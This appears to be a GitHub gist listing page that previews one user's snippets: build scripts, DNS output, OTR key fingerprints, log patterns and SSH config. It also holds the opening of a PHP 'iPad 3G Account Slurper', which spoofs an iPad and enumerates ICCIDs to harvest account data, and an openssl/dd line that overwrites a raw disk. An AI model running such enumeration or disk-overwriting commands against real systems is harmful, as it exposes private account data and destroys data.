This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ganymede:~ sneak$ mysql | |
Welcome to the MySQL monitor. Commands end with ; or \g. | |
Your MySQL connection id is 2 | |
Server version: 5.5.12 MySQL Community Server (GPL) | |
Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved. | |
Oracle is a registered trademark of Oracle Corporation and/or its | |
affiliates. Other names may be trademarks of their respective | |
owners. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
cd /usr/local/src | |
if [ ! -e zeromq-2.1.7.tar.gz ]; then | |
curl -O http://download.zeromq.org/zeromq-2.1.7.tar.gz | |
fi | |
#export FLAGS="-arch i386 -arch x86_64 -isysroot /Developer/SDKs/MacOSX10.4u.sdk -arch ppc" | |
export FLAGS="-arch i386 -arch x86_64" | |
export CFLAGS="$FLAGS" | |
export CXXFLAGS="$FLAGS" | |
cd /usr/local/src |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ganymede:~ sneak$ host txl1.local | |
txl1.local has address 10.112.128.109 | |
ganymede:~ sneak$ dig txl1.local | |
; <<>> DiG 9.6.0-APPLE-P2 <<>> txl1.local | |
;; global options: +cmd | |
;; Got answer: | |
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 34843 | |
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-----BEGIN PGP SIGNED MESSAGE----- | |
Hash: SHA256 | |
Updated: 5 June 2012 | |
[email protected] xmpp otr key: | |
DEDDEBB7 444A27F6 F48FD1A1 921880F2 75D7E1EF | |
[email protected] aim otr key: | |
18F1582E D1B133F0 833912C7 F8350AB9 FE7AFDC9 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
// iPad 3G Account Slurper | |
// | |
// Usage: ./ipadump.php ICCID-base count | |
// (The script generates the final checkdigit to produce ICCIDs from the entered base) | |
$useragent="Mozilla/5.0 (iPad)"; //Spoof as iPad | |
$ICCIDroot = $_SERVER['argv'][1]; | |
$ICCIDcount = $_SERVER['argv'][2]; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POSTFIXHOST (%{HOST:remotehostname}\[%{IP:remoteip}\]) | |
POSTFIXQID (?:<postfix_queue_id>[0-9A-F]{11}|NOQUEUE): | |
RSYSLOGRELPMESSAGE (%{SYSLOG5424PRI}%{TIMESTAMP_ISO8601:syslog5424_ts} %{SYSLOGHOST:loghost} %{SYSLOGPROG}: %{GREEDYDATA:message}) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Host *.docker | |
User root | |
ProxyCommand ssh -T [email protected] 'dockerssh %h' 2> /dev/null |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
EX="" | |
EX+=" --exclude=.DS_Store" | |
EX+=" --exclude=/iBooks.app/" | |
EX+=" --exclude=/iTunes.app/" | |
EX+=" --exclude=/FaceTime.app/" | |
EX+=" --exclude=/Calendar.app/" | |
EX+=" --exclude=/Mail.app/" | |
EX+=" --exclude=/QuickTime?Player.app/" | |
EX+=" --exclude=/Safari.app/" | |
EX+=" --exclude=/Preview.app/" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Verifying myself: My Bitcoin username is +sneak. https://onename.io/sneak |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/usr/local/Cellar/openssl/1.0.2a-1/bin/openssl enc -aes-128-ctr \ | |
-pass pass:"$(dd if=/dev/urandom bs=128 count=1 2>/dev/null | base64)" -nosalt < /dev/zero | \ | |
pv -p -e -r --size 512G | \ | |
dd of=/dev/rdisk2 bs=10m |
OlderNewer